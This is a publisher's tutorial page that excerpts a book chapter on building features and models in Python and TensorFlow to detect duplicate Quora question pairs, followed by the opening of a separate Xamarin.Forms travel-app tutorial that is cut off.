Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials

7019 Articles
article-image-use-tensorflow-and-nlp-to-detect-duplicate-quora-questions-tutorial
Sunith Shetty
21 Jun 2018
32 min read
Save for later

Use TensorFlow and NLP to detect duplicate Quora questions [Tutorial]

Sunith Shetty
21 Jun 2018
32 min read
This tutorial shows how to build an NLP project with TensorFlow that explicates the semantic similarity between sentences using the Quora dataset. It is based on the work of Abhishek Thakur, who originally developed a solution on the Keras package. This article is an excerpt from a book written by Luca Massaron, Alberto Boschetti, Alexey Grigorev, Abhishek Thakur, and Rajalingappaa Shanmugamani titled TensorFlow Deep Learning Projects. Presenting the dataset The data, made available for non-commercial purposes (https://www.quora.com/about/tos) in a Kaggle competition (https://www.kaggle.com/c/quora-question-pairs) and on Quora's blog (https://data.quora.com/First-Quora-Dataset-Release-Question-Pairs), consists of 404,351 question pairs with 255,045 negative samples (non-duplicates) and 149,306 positive samples (duplicates). There are approximately 40% positive samples, a slight imbalance that won't need particular corrections. Actually, as reported on the Quora blog, given their original sampling strategy, the number of duplicated examples in the dataset was much higher than the non-duplicated ones. In order to set up a more balanced dataset, the negative examples were upsampled by using pairs of related questions, that is, questions about the same topic that are actually not similar. Before starting work on this project, you can simply directly download the data, which is about 55 MB, from its Amazon S3 repository at this link into our working directory. After loading it, we can start diving directly into the data by picking some example rows and examining them. The following diagram shows an actual snapshot of the few first rows from the dataset: Exploring further into the data, we can find some examples of question pairs that mean the same thing, that is, duplicates, as follows:  How does Quora quickly mark questions as needing improvement? Why does Quora mark my questions as needing improvement/clarification before I have time to give it details? Literally within seconds… Why did Trump win the Presidency? How did Donald Trump win the 2016 Presidential Election? What practical applications might evolve from the discovery of the Higgs Boson? What are some practical benefits of the discovery of the Higgs Boson? At first sight, duplicated questions have quite a few words in common, but they could be very different in length. On the other hand, examples of non-duplicate questions are as follows: Who should I address my cover letter to if I'm applying to a big company like Mozilla? Which car is better from a safety persepctive? swift or grand i10. My first priority is safety? Mr. Robot (TV series): Is Mr. Robot a good representation of real-life hacking and hacking culture? Is the depiction of hacker societies realistic? What mistakes are made when depicting hacking in Mr. Robot compared to real-life cyber security breaches or just a regular use of technologies? How can I start an online shopping (e-commerce) website? Which web technology is best suited for building a big e-commerce website? Some questions from these examples are clearly not duplicated and have few words in common, but some others are more difficult to detect as unrelated. For instance, the second pair in the example might turn to be appealing to some and leave even a human judge uncertain. The two questions might mean different things: why versus how, or they could be intended as the same from a superficial examination. Looking deeper, we may even find more doubtful examples and even some clear data mistakes; we surely have some anomalies in the dataset (as the Quota post on the dataset warned) but, given that the data is derived from a real-world problem, we can't do anything but deal with this kind of imperfection and strive to find a robust solution that works. At this point, our exploration becomes more quantitative than qualitative and some statistics on the question pairs are provided here: Average number of characters in question1 59.57 Minimum number of characters in question1 1 Maximum number of characters in question1 623 Average number of characters in question2 60.14 Minimum number of characters in question2 1 Maximum number of characters in question2 1169 Question 1 and question 2 are roughly the same average characters, though we have more extremes in question 2. There also must be some trash in the data, since we cannot figure out a question made up of a single character. We can even get a completely different vision of our data by plotting it into a word cloud and highlighting the most common words present in the dataset: Figure 1: A word cloud made up of the most frequent words to be found in the Quora dataset The presence of word sequences such as Hillary Clinton and Donald Trump reminds us that the data was gathered at a certain historical moment and that many questions we can find inside it are clearly ephemeral, reasonable only at the very time the dataset was collected. Other topics, such as programming language, World War, or earn money could be longer lasting, both in terms of interest and in the validity of the answers provided. After exploring the data a bit, it is now time to decide what target metric we will strive to optimize in our project. Throughout the article, we will be using accuracy as a metric to evaluate the performance of our models. Accuracy as a measure is simply focused on the effectiveness of the prediction, and it may miss some important differences between alternative models, such as discrimination power (is the model more able to detect duplicates or not?) or the exactness of probability scores (how much margin is there between being a duplicate and not being one?). We chose accuracy based on the fact that this metric was the one decided on by Quora's engineering team to create a benchmark for this dataset (as stated in this blog post of theirs: https://engineering.quora.com/Semantic-Question-Matching-with-Deep-Learning). Using accuracy as the metric makes it easier for us to evaluate and compare our models with the one from Quora's engineering team, and also several other research papers. In addition, in a real-world application, our work may simply be evaluated on the basis of how many times it is just right or wrong, regardless of other considerations. We can now proceed furthermore in our projects with some very basic feature engineering to start with. Starting with basic feature engineering Before starting to code, we have to load the dataset in Python and also provide Python with all the necessary packages for our project. We will need to have these packages installed on our system (the latest versions should suffice, no need for any specific package version): Numpy pandas fuzzywuzzy python-Levenshtein scikit-learn gensim pyemd NLTK As we will be using each one of these packages in the project, we will provide specific instructions and tips to install them. For all dataset operations, we will be using pandas (and Numpy will come in handy, too). To install numpy and pandas: pip install numpy pip install pandas The dataset can be loaded into memory easily by using pandas and a specialized data structure, the pandas dataframe (we expect the dataset to be in the same directory as your script or Jupyter notebook): import pandas as pd import numpy as np data = pd.read_csv('quora_duplicate_questions.tsv', sep='t') data = data.drop(['id', 'qid1', 'qid2'], axis=1) We will be using the pandas dataframe denoted by data , and also when we work with our TensorFlow model and provide input to it. We can now start by creating some very basic features. These basic features include length-based features and string-based features: Length of question1 Length of question2 Difference between the two lengths Character length of question1 without spaces Character length of question2 without spaces Number of words in question1 Number of words in question2 Number of common words in question1 and question2 These features are dealt with one-liners transforming the original input using the pandas package in Python and its method apply: # length based features data['len_q1'] = data.question1.apply(lambda x: len(str(x))) data['len_q2'] = data.question2.apply(lambda x: len(str(x))) # difference in lengths of two questions data['diff_len'] = data.len_q1 - data.len_q2 # character length based features data['len_char_q1'] = data.question1.apply(lambda x: len(''.join(set(str(x).replace(' ', ''))))) data['len_char_q2'] = data.question2.apply(lambda x: len(''.join(set(str(x).replace(' ', ''))))) # word length based features data['len_word_q1'] = data.question1.apply(lambda x: len(str(x).split())) data['len_word_q2'] = data.question2.apply(lambda x: len(str(x).split())) # common words in the two questions data['common_words'] = data.apply(lambda x: len(set(str(x['question1']) .lower().split()) .intersection(set(str(x['question2']) .lower().split()))), axis=1) For future reference, we will mark this set of features as feature set-1 or fs_1: fs_1 = ['len_q1', 'len_q2', 'diff_len', 'len_char_q1', 'len_char_q2', 'len_word_q1', 'len_word_q2', 'common_words'] This simple approach will help you to easily recall and combine a different set of features in the machine learning models we are going to build, turning comparing different models run by different feature sets into a piece of cake. Creating fuzzy features The next set of features are based on fuzzy string matching. Fuzzy string matching is also known as approximate string matching and is the process of finding strings that approximately match a given pattern. The closeness of a match is defined by the number of primitive operations necessary to convert the string into an exact match. These primitive operations include insertion (to insert a character at a given position), deletion (to delete a particular character), and substitution (to replace a character with a new one). Fuzzy string matching is typically used for spell checking, plagiarism detection, DNA sequence matching, spam filtering, and so on and it is part of the larger family of edit distances, distances based on the idea that a string can be transformed into another one. It is frequently used in natural language processing and other applications in order to ascertain the grade of difference between two strings of characters. It is also known as Levenshtein distance, from the name of the Russian scientist, Vladimir Levenshtein, who introduced it in 1965. These features were created using the fuzzywuzzy package available for Python (https://pypi.python.org/pypi/fuzzywuzzy). This package uses Levenshtein distance to calculate the differences in two sequences, which in our case are the pair of questions. The fuzzywuzzy package can be installed using pip3: pip install fuzzywuzzy As an important dependency, fuzzywuzzy requires the Python-Levenshtein package (https://github.com/ztane/python-Levenshtein/), which is a blazingly fast implementation of this classic algorithm, powered by compiled C code. To make the calculations much faster using fuzzywuzzy, we also need to install the Python-Levenshtein package: pip install python-Levenshtein The fuzzywuzzy package offers many different types of ratio, but we will be using only the following: QRatio WRatio Partial ratio Partial token set ratio Partial token sort ratio Token set ratio Token sort ratio Examples of fuzzywuzzy features on Quora data: from fuzzywuzzy import fuzz fuzz.QRatio("Why did Trump win the Presidency?", "How did Donald Trump win the 2016 Presidential Election") This code snippet will result in the value of 67 being returned: fuzz.QRatio("How can I start an online shopping (e-commerce) website?", "Which web technology is best suitable for building a big E-Commerce website?") In this comparison, the returned value will be 60. Given these examples, we notice that although the values of QRatio are close to each other, the value for the similar question pair from the dataset is higher than the pair with no similarity. Let's take a look at another feature from fuzzywuzzy for these same pairs of questions: fuzz.partial_ratio("Why did Trump win the Presidency?", "How did Donald Trump win the 2016 Presidential Election") In this case, the returned value is 73: fuzz.partial_ratio("How can I start an online shopping (e-commerce) website?", "Which web technology is best suitable for building a big E-Commerce website?") Now the returned value is 57. Using the partial_ratio method, we can observe how the difference in scores for these two pairs of questions increases notably, allowing an easier discrimination between being a duplicate pair or not. We assume that these features might add value to our models. By using pandas and the fuzzywuzzy package in Python, we can again apply these features as simple one-liners: data['fuzz_qratio'] = data.apply(lambda x: fuzz.QRatio( str(x['question1']), str(x['question2'])), axis=1) data['fuzz_WRatio'] = data.apply(lambda x: fuzz.WRatio( str(x['question1']), str(x['question2'])), axis=1) data['fuzz_partial_ratio'] = data.apply(lambda x: fuzz.partial_ratio(str(x['question1']), str(x['question2'])), axis=1) data['fuzz_partial_token_set_ratio'] = data.apply(lambda x: fuzz.partial_token_set_ratio(str(x['question1']), str(x['question2'])), axis=1) data['fuzz_partial_token_sort_ratio'] = data.apply(lambda x: fuzz.partial_token_sort_ratio(str(x['question1']), str(x['question2'])), axis=1) data['fuzz_token_set_ratio'] = data.apply(lambda x: fuzz.token_set_ratio(str(x['question1']), str(x['question2'])), axis=1) data['fuzz_token_sort_ratio'] = data.apply(lambda x: fuzz.token_sort_ratio(str(x['question1']), str(x['question2'])), axis=1) This set of features are henceforth denoted as feature set-2 or fs_2: fs_2 = ['fuzz_qratio', 'fuzz_WRatio', 'fuzz_partial_ratio', 'fuzz_partial_token_set_ratio', 'fuzz_partial_token_sort_ratio', 'fuzz_token_set_ratio', 'fuzz_token_sort_ratio'] Again, we will store our work and save it for later use when modeling. Resorting to TF-IDF and SVD features The next few sets of features are based on TF-IDF and SVD. Term Frequency-Inverse Document Frequency (TF-IDF). Is one of the algorithms at the foundation of information retrieval. Here, the algorithm is explained using a formula: You can understand the formula using this notation: C(t) is the number of times a term t appears in a document, N is the total number of terms in the document, this results in the Term Frequency (TF).  ND is the total number of documents and NDt is the number of documents containing the term t, this provides the Inverse Document Frequency (IDF).  TF-IDF for a term t is a multiplication of Term Frequency and Inverse Document Frequency for the given term t: Without any prior knowledge, other than about the documents themselves, such a score will highlight all the terms that could easily discriminate a document from the others, down-weighting the common words that won't tell you much, such as the common parts of speech (such as articles, for instance). If you need a more hands-on explanation of TFIDF, this great online tutorial will help you try coding the algorithm yourself and testing it on some text data: https://stevenloria.com/tf-idf/ For convenience and speed of execution, we resorted to the scikit-learn implementation of TFIDF.  If you don't already have scikit-learn installed, you can install it using pip: pip install -U scikit-learn We create TFIDF features for both question1 and question2 separately (in order to type less, we just deep copy the question1 TfidfVectorizer): from sklearn.feature_extraction.text import TfidfVectorizer from copy import deepcopy tfv_q1 = TfidfVectorizer(min_df=3, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'w{1,}', ngram_range=(1, 2), use_idf=1, smooth_idf=1, sublinear_tf=1, stop_words='english') tfv_q2 = deepcopy(tfv_q1) It must be noted that the parameters shown here have been selected after quite a lot of experiments. These parameters generally work pretty well with all other problems concerning natural language processing, specifically text classification. One might need to change the stop word list to the language in question. We can now obtain the TFIDF matrices for question1 and question2 separately: q1_tfidf = tfv_q1.fit_transform(data.question1.fillna("")) q2_tfidf = tfv_q2.fit_transform(data.question2.fillna("")) In our TFIDF processing, we computed the TFIDF matrices based on all the data available (we used the fit_transform method). This is quite a common approach in Kaggle competitions because it helps to score higher on the leaderboard. However, if you are working in a real setting, you may want to exclude a part of the data as a training or validation set in order to be sure that your TFIDF processing helps your model to generalize to a new, unseen dataset. After we have the TFIDF features, we move to SVD features. SVD is a feature decomposition method and it stands for singular value decomposition. It is largely used in NLP because of a technique called Latent Semantic Analysis (LSA). A detailed discussion of SVD and LSA is beyond the scope of this article, but you can get an idea of their workings by trying these two approachable and clear online tutorials: https://alyssaq.github.io/2015/singular-value-decomposition-visualisation/ and https://technowiki.wordpress.com/2011/08/27/latent-semantic-analysis-lsa-tutorial/ To create the SVD features, we again use scikit-learn implementation. This implementation is a variation of traditional SVD and is known as TruncatedSVD. A TruncatedSVD is an approximate SVD method that can provide you with reliable yet computationally fast SVD matrix decomposition. You can find more hints about how this technique works and it can be applied by consulting this web page: http://langvillea.people.cofc.edu/DISSECTION-LAB/Emmie'sLSI-SVDModule/p5module.html from sklearn.decomposition import TruncatedSVD svd_q1 = TruncatedSVD(n_components=180) svd_q2 = TruncatedSVD(n_components=180) We chose 180 components for SVD decomposition and these features are calculated on a TF-IDF matrix: question1_vectors = svd_q1.fit_transform(q1_tfidf) question2_vectors = svd_q2.fit_transform(q2_tfidf) Feature set-3 is derived from a combination of these TF-IDF and SVD features. For example, we can have only the TF-IDF features for the two questions separately going into the model, or we can have the TF-IDF of the two questions combined with an SVD on top of them, and then the model kicks in, and so on. These features are explained as follows. Feature set-3(1) or fs3_1 is created using two different TF-IDFs for the two questions, which are then stacked together horizontally and passed to a machine learning model: This can be coded as: from scipy import sparse # obtain features by stacking the sparse matrices together fs3_1 = sparse.hstack((q1_tfidf, q2_tfidf)) Feature set-3(2), or fs3_2, is created by combining the two questions and using a single TF-IDF: tfv = TfidfVectorizer(min_df=3, max_features=None, strip_accents='unicode', analyzer='word', token_pattern=r'w{1,}', ngram_range=(1, 2), use_idf=1, smooth_idf=1, sublinear_tf=1, stop_words='english') # combine questions and calculate tf-idf q1q2 = data.question1.fillna("") q1q2 += " " + data.question2.fillna("") fs3_2 = tfv.fit_transform(q1q2) The next subset of features in this feature set, feature set-3(3) or fs3_3, consists of separate TF-IDFs and SVDs for both questions: This can be coded as follows: # obtain features by stacking the matrices together fs3_3 = np.hstack((question1_vectors, question2_vectors)) We can similarly create a couple more combinations using TF-IDF and SVD, and call them fs3-4 and fs3-5, respectively. These are depicted in the following diagrams, but the code is left as an exercise for the reader. Feature set-3(4) or fs3-4: Feature set-3(5) or fs3-5: After the basic feature set and some TF-IDF and SVD features, we can now move to more complicated features before diving into the machine learning and deep learning models. Mapping with Word2vec embeddings Very broadly, Word2vec models are two-layer neural networks that take a text corpus as input and output a vector for every word in that corpus. After fitting, the words with similar meaning have their vectors close to each other, that is, the distance between them is small compared to the distance between the vectors for words that have very different meanings. Nowadays, Word2vec has become a standard in natural language processing problems and often it provides very useful insights into information retrieval tasks. For this particular problem, we will be using the Google news vectors. This is a pretrained Word2vec model trained on the Google News corpus. Every word, when represented by its Word2vec vector, gets a position in space, as depicted in the following diagram: All the words in this example, such as Germany, Berlin, France, and Paris, can be represented by a 300-dimensional vector, if we are using the pretrained vectors from the Google news corpus. When we use Word2vec representations for these words and we subtract the vector of Germany from the vector of Berlin and add the vector of France to it, we will get a vector that is very similar to the vector of Paris. The Word2vec model thus carries the meaning of words in the vectors. The information carried by these vectors constitutes a very useful feature for our task. For a user-friendly, yet more in-depth, explanation and description of possible applications of Word2vec, we suggest reading https://www.distilled.net/resources/a-beginners-guide-to-Word2vec-aka-whats-the-opposite-of-canada/, or if you need a more mathematically defined explanation, we recommend reading this paper: http://www.1-4-5.net/~dmm/ml/how_does_Word2vec_work.pdf To load the Word2vec features, we will be using Gensim. If you don't have Gensim, you can install it easily using pip. At this time, it is suggested you also install the pyemd package, which will be used by the WMD distance function, a function that will help us to relate two Word2vec vectors: pip install gensim pip install pyemd To load the Word2vec model, we download the GoogleNews-vectors-negative300.bin.gz binary and use Gensim's load_Word2vec_format function to load it into memory. You can easily download the binary from an Amazon AWS repository using the wget command from a shell: wget -c "https://s3.amazonaws.com/dl4j-distribution/GoogleNews-vectors-negative300.bin.gz" After downloading and decompressing the file, you can use it with the Gensim KeyedVectors functions: import gensim model = gensim.models.KeyedVectors.load_word2vec_format( 'GoogleNews-vectors-negative300.bin.gz', binary=True) Now, we can easily get the vector of a word by calling model[word]. However, a problem arises when we are dealing with sentences instead of individual words. In our case, we need vectors for all of question1 and question2 in order to come up with some kind of comparison. For this, we can use the following code snippet. The snippet basically adds the vectors for all words in a sentence that are available in the Google news vectors and gives a normalized vector at the end. We can call this sentence to vector, or Sent2Vec. Make sure that you have Natural Language Tool Kit (NLTK) installed before running the preceding function: $ pip install nltk It is also suggested that you download the punkt and stopwords packages, as they are part of NLTK: import nltk nltk.download('punkt') nltk.download('stopwords') If NLTK is now available, you just have to run the following snippet and define the sent2vec function: from nltk.corpus import stopwords from nltk import word_tokenize stop_words = set(stopwords.words('english')) def sent2vec(s, model): M = [] words = word_tokenize(str(s).lower()) for word in words: #It shouldn't be a stopword if word not in stop_words: #nor contain numbers if word.isalpha(): #and be part of word2vec if word in model: M.append(model[word]) M = np.array(M) if len(M) > 0: v = M.sum(axis=0) return v / np.sqrt((v ** 2).sum()) else: return np.zeros(300) When the phrase is null, we arbitrarily decide to give back a standard vector of zero values. To calculate the similarity between the questions, another feature that we created was word mover's distance. Word mover's distance uses Word2vec embeddings and works on a principle similar to that of earth mover's distance to give a distance between two text documents. Simply put, word mover's distance provides the minimum distance needed to move all the words from one document to another document. The WMD has been introduced by this paper: KUSNER, Matt, et al. From word embeddings to document distances. In: International Conference on Machine Learning. 2015. p. 957-966 which can be found at http://proceedings.mlr.press/v37/kusnerb15.pdf. For a hands-on tutorial on the distance, you can also refer to this tutorial based on the Gensim implementation of the distance: https://markroxor.github.io/gensim/static/notebooks/WMD_tutorial.html Final Word2vec (w2v) features also include other distances, more usual ones such as the Euclidean or cosine distance. We complete the sequence of features with some measurement of the distribution of the two document vectors: Word mover distance Normalized word mover distance Cosine distance between vectors of question1 and question2 Manhattan distance between vectors of question1 and question2 Jaccard similarity between vectors of question1 and question2 Canberra distance between vectors of question1 and question2 Euclidean distance between vectors of question1 and question2 Minkowski distance between vectors of question1 and question2 Braycurtis distance between vectors of question1 and question2 The skew of the vector for question1 The skew of the vector for question2 The kurtosis of the vector for question1 The kurtosis of the vector for question2 All the Word2vec features are denoted by fs4. A separate set of w2v features consists in the matrices of Word2vec vectors themselves: Word2vec vector for question1 Word2vec vector for question2 These will be represented by fs5: w2v_q1 = np.array([sent2vec(q, model) for q in data.question1]) w2v_q2 = np.array([sent2vec(q, model) for q in data.question2]) In order to easily implement all the different distance measures between the vectors of the Word2vec embeddings of the Quora questions, we use the implementations found in the scipy.spatial.distance module: from scipy.spatial.distance import cosine, cityblock, jaccard, canberra, euclidean, minkowski, braycurtis data['cosine_distance'] = [cosine(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] data['cityblock_distance'] = [cityblock(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] data['jaccard_distance'] = [jaccard(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] data['canberra_distance'] = [canberra(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] data['euclidean_distance'] = [euclidean(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] data['minkowski_distance'] = [minkowski(x,y,3) for (x,y) in zip(w2v_q1, w2v_q2)] data['braycurtis_distance'] = [braycurtis(x,y) for (x,y) in zip(w2v_q1, w2v_q2)] All the features names related to distances are gathered under the list fs4_1: fs4_1 = ['cosine_distance', 'cityblock_distance', 'jaccard_distance', 'canberra_distance', 'euclidean_distance', 'minkowski_distance', 'braycurtis_distance'] The Word2vec matrices for the two questions are instead horizontally stacked and stored away in the w2v variable for later usage: w2v = np.hstack((w2v_q1, w2v_q2)) The Word Mover's Distance is implemented using a function that returns the distance between two questions, after having transformed them into lowercase and after removing any stopwords. Moreover, we also calculate a normalized version of the distance, after transforming all the Word2vec vectors into L2-normalized vectors (each vector is transformed to the unit norm, that is, if we squared each element in the vector and summed all of them, the result would be equal to one) using the init_sims method: def wmd(s1, s2, model): s1 = str(s1).lower().split() s2 = str(s2).lower().split() stop_words = stopwords.words('english') s1 = [w for w in s1 if w not in stop_words] s2 = [w for w in s2 if w not in stop_words] return model.wmdistance(s1, s2) data['wmd'] = data.apply(lambda x: wmd(x['question1'], x['question2'], model), axis=1) model.init_sims(replace=True) data['norm_wmd'] = data.apply(lambda x: wmd(x['question1'], x['question2'], model), axis=1) fs4_2 = ['wmd', 'norm_wmd'] After these last computations, we now have most of the important features that are needed to create some basic machine learning models, which will serve as a benchmark for our deep learning models. The following table displays a snapshot of the available features: Let's train some machine learning models on these and other Word2vec based features. Testing machine learning models Before proceeding, depending on your system, you may need to clean up the memory a bit and free space for machine learning models from previously used data structures. This is done using gc.collect, after deleting any past variables not required anymore, and then checking the available memory by exact reporting from the psutil.virtualmemory function: import gc import psutil del([tfv_q1, tfv_q2, tfv, q1q2, question1_vectors, question2_vectors, svd_q1, svd_q2, q1_tfidf, q2_tfidf]) del([w2v_q1, w2v_q2]) del([model]) gc.collect() psutil.virtual_memory() At this point, we simply recap the different features created up to now, and their meaning in terms of generated features: fs_1: List of basic features fs_2: List of fuzzy features fs3_1: Sparse data matrix of TFIDF for separated questions fs3_2: Sparse data matrix of TFIDF for combined questions fs3_3: Sparse data matrix of SVD fs3_4: List of SVD statistics fs4_1: List of w2vec distances fs4_2: List of wmd distances w2v: A matrix of transformed phrase's Word2vec vectors by means of the Sent2Vec function We evaluate two basic and very popular models in machine learning, namely logistic regression and gradient boosting using the xgboost package in Python. The following table provides the performance of the logistic regression and xgboost algorithms on different sets of features created earlier, as obtained during the Kaggle competition: Feature set Logistic regression accuracy xgboost accuracy Basic features (fs1) 0.658 0.721 Basic features + fuzzy features (fs1 + fs2) 0.660 0.738 Basic features + fuzzy features + w2v features (fs1 + fs2 + fs4) 0.676 0.766 W2v vector features (fs5) * 0.78 Basic features + fuzzy features + w2v features + w2v vector features (fs1 + fs2 + fs4 + fs5) * 0.814 TFIDF-SVD features (fs3-1) 0.777 0.749 TFIDF-SVD features (fs3-2) 0.804 0.748 TFIDF-SVD features (fs3-3) 0.706 0.763 TFIDF-SVD features (fs3-4) 0.700 0.753 TFIDF-SVD features (fs3-5) 0.714 0.759 * = These models were not trained due to high memory requirements. We can treat the performances achieved as benchmarks or baseline numbers before starting with deep learning models, but we won't limit ourselves to that and we will be trying to replicate some of them. We are going to start by importing all the necessary packages. As for as the logistic regression, we will be using the scikit-learn implementation. The xgboost is a scalable, portable, and distributed gradient boosting library (a tree ensemble machine learning algorithm). Initially created by Tianqi Chen from Washington University, it has been enriched with a Python wrapper by Bing Xu, and an R interface by Tong He (you can read the story behind xgboost directly from its principal creator at homes.cs.washington.edu/~tqchen/2016/03/10/story-and-lessons-behind-the-evolution-of-xgboost.html ). The xgboost is available for Python, R, Java, Scala, Julia, and C++, and it can work both on a single machine (leveraging multithreading) and in Hadoop and Spark clusters. Detailed instruction for installing xgboost on your system can be found on this page: github.com/dmlc/xgboost/blob/master/doc/build.md The installation of xgboost on both Linux and macOS is quite straightforward, whereas it is a little bit trickier for Windows users. For this reason, we provide specific installation steps for having xgboost working on Windows: First, download and install Git for Windows (git-for-windows.github.io) Then, you need a MINGW compiler present on your system. You can download it from www.mingw.org according to the characteristics of your system From the command line, execute: $> git clone --recursive https://github.com/dmlc/xgboost $> cd xgboost $> git submodule init $> git submodule update Then, always from the command line, you copy the configuration for 64-byte systems to be the default one: $> copy makemingw64.mk config.mk Alternatively, you just copy the plain 32-byte version: $> copy makemingw.mk config.mk After copying the configuration file, you can run the compiler, setting it to use four threads in order to speed up the compiling process: $> mingw32-make -j4 In MinGW, the make command comes with the name mingw32-make; if you are using a different compiler, the previous command may not work, but you can simply try: $> make -j4 Finally, if the compiler completed its work without errors, you can install the package in Python with: $> cd python-package $> python setup.py install If xgboost has also been properly installed on your system, you can proceed with importing both machine learning algorithms: from sklearn import linear_model from sklearn.preprocessing import StandardScaler import xgboost as xgb Since we will be using a logistic regression solver that is sensitive to the scale of the features (it is the sag solver from https://github.com/EpistasisLab/tpot/issues/292, which requires a linear computational time in respect to the size of the data), we will start by standardizing the data using the scaler function in scikit-learn: scaler = StandardScaler() y = data.is_duplicate.values y = y.astype('float32').reshape(-1, 1) X = data[fs_1+fs_2+fs3_4+fs4_1+fs4_2] X = X.replace([np.inf, -np.inf], np.nan).fillna(0).values X = scaler.fit_transform(X) X = np.hstack((X, fs3_3)) We also select the data for the training by first filtering the fs_1, fs_2, fs3_4, fs4_1, and fs4_2 set of variables, and then stacking the fs3_3 sparse SVD data matrix. We also provide a random split, separating 1/10 of the data for validation purposes (in order to effectively assess the quality of the created model): np.random.seed(42) n_all, _ = y.shape idx = np.arange(n_all) np.random.shuffle(idx) n_split = n_all // 10 idx_val = idx[:n_split] idx_train = idx[n_split:] x_train = X[idx_train] y_train = np.ravel(y[idx_train]) x_val = X[idx_val] y_val = np.ravel(y[idx_val]) As a first model, we try logistic regression, setting the regularization l2 parameter C to 0.1 (modest regularization). Once the model is ready, we test its efficacy on the validation set (x_val for the training matrix, y_val for the correct answers). The results are assessed on accuracy, that is the proportion of exact guesses on the validation set: logres = linear_model.LogisticRegression(C=0.1, solver='sag', max_iter=1000) logres.fit(x_train, y_train) lr_preds = logres.predict(x_val) log_res_accuracy = np.sum(lr_preds == y_val) / len(y_val) print("Logistic regr accuracy: %0.3f" % log_res_accuracy) After a while (the solver has a maximum of 1,000 iterations before giving up converging the results), the resulting accuracy on the validation set will be 0.743, which will be our starting baseline. Now, we try to predict using the xgboost algorithm. Being a gradient boosting algorithm, this learning algorithm has more variance (ability to fit complex predictive functions, but also to overfit) than a simple logistic regression afflicted by greater bias (in the end, it is a summation of coefficients) and so we expect much better results. We fix the max depth of its decision trees to 4 (a shallow number, which should prevent overfitting) and we use an eta of 0.02 (it will need to grow many trees because the learning is a bit slow). We also set up a watchlist, keeping an eye on the validation set for an early stop if the expected error on the validation doesn't decrease for over 50 steps. It is not best practice to stop early on the same set (the validation set in our case) we use for reporting the final results. In a real-world setting, ideally, we should set up a validation set for tuning operations, such as early stopping, and a test set for reporting the expected results when generalizing to new data. After setting all this, we run the algorithm. This time, we will have to wait for longer than we when running the logistic regression: params = dict() params['objective'] = 'binary:logistic' params['eval_metric'] = ['logloss', 'error'] params['eta'] = 0.02 params['max_depth'] = 4 d_train = xgb.DMatrix(x_train, label=y_train) d_valid = xgb.DMatrix(x_val, label=y_val) watchlist = [(d_train, 'train'), (d_valid, 'valid')] bst = xgb.train(params, d_train, 5000, watchlist, early_stopping_rounds=50, verbose_eval=100) xgb_preds = (bst.predict(d_valid) >= 0.5).astype(int) xgb_accuracy = np.sum(xgb_preds == y_val) / len(y_val) print("Xgb accuracy: %0.3f" % xgb_accuracy) The final result reported by xgboost is 0.803 accuracy on the validation set. Building TensorFlow model The deep learning models in this article are built using TensorFlow, based on the original script written by Abhishek Thakur using Keras (you can read the original code at https://github.com/abhishekkrthakur/is_that_a_duplicate_quora_question). Keras is a Python library that provides an easy interface to TensorFlow. Tensorflow has official support for Keras, and the models trained using Keras can easily be converted to TensorFlow models. Keras enables the very fast prototyping and testing of deep learning models. In our project, we rewrote the solution entirely in TensorFlow from scratch anyway. To start, let's import the necessary libraries, in particular, TensorFlow, and let's check its version by printing it: import zipfile from tqdm import tqdm_notebook as tqdm import tensorflow as tf print("TensorFlow version %s" % tf.__version__) At this point, we simply load the data into the df pandas dataframe or we load it from disk. We replace the missing values with an empty string and we set the y variable containing the target answer encoded as 1 (duplicated) or 0 (not duplicated): try: df = data[['question1', 'question2', 'is_duplicate']] except: df = pd.read_csv('data/quora_duplicate_questions.tsv', sep='t') df = df.drop(['id', 'qid1', 'qid2'], axis=1) df = df.fillna('') y = df.is_duplicate.values y = y.astype('float32').reshape(-1, 1) To summarize, we built a model with the help of TensorFlow in order to detect duplicated questions from the Quora dataset. To know more about how to build and train your own deep learning models with TensorFlow confidently, do checkout this book TensorFlow Deep Learning Projects. TensorFlow 1.9.0-rc0 release announced Implementing feedforward networks with TensorFlow How TFLearn makes building TensorFlow models easier
Read more
  • 0
  • 1
  • 40330

article-image-create-a-travel-app-with-xamarin
Sugandha Lahoti
20 Jun 2018
14 min read
Save for later

Create a travel app with Xamarin [Tutorial]

Sugandha Lahoti
20 Jun 2018
14 min read
Just like the beginning of many new mobile projects, we will start with an idea. In this tutorial, we will create a new Xamarin.Forms mobile app named TripLog with an initial app structure and user interface. Like the name suggests, it will be an app that will allow its users to log their travel adventures. Although the app might not solve any real-world problems, it will have features that will require us to solve real-world architecture and coding problems. This article is an excerpt from the book Mastering Xamaring.Forms by Ed Snider. Defining features Before we get started, it is important to understand the requirements and features of the TripLog app. We will do this by quickly defining some of the high-level things this app will allow its users to do: View existing log entries (online and offline) Add new log entries with the following data: Title Location using GPS Date Notes Rating Sign into the app Creating the initial app To start off the new TripLog mobile app project, we will need to create the initial solution architecture. We can also create the core shell of our app's user interface by creating the initial screens based on the basic features we have just defined. Setting up the solution We will start things off by creating a brand new, blank Xamarin.Forms solution within Visual Studio by performing the following steps: In Visual Studio, click on File | New Solution. This will bring up a series of dialog screens that will walk you through creating a new Xamarin.Forms solution. On the first dialog, click on App on the left-hand side, under the Multiplatform section, and then select Blank Forms App, as shown in the following screenshot: On the next dialog screen, enter the name of the app, TripLog, ensure that Use Portable Class Library is selected for the Shared Code option, and that Use XAML for user interface files option is checked, as shown in the following screenshot: The Xamarin.Forms project template in Visual Studio for Windows will use a .NET Standard library instead of a Portable Class Library for its 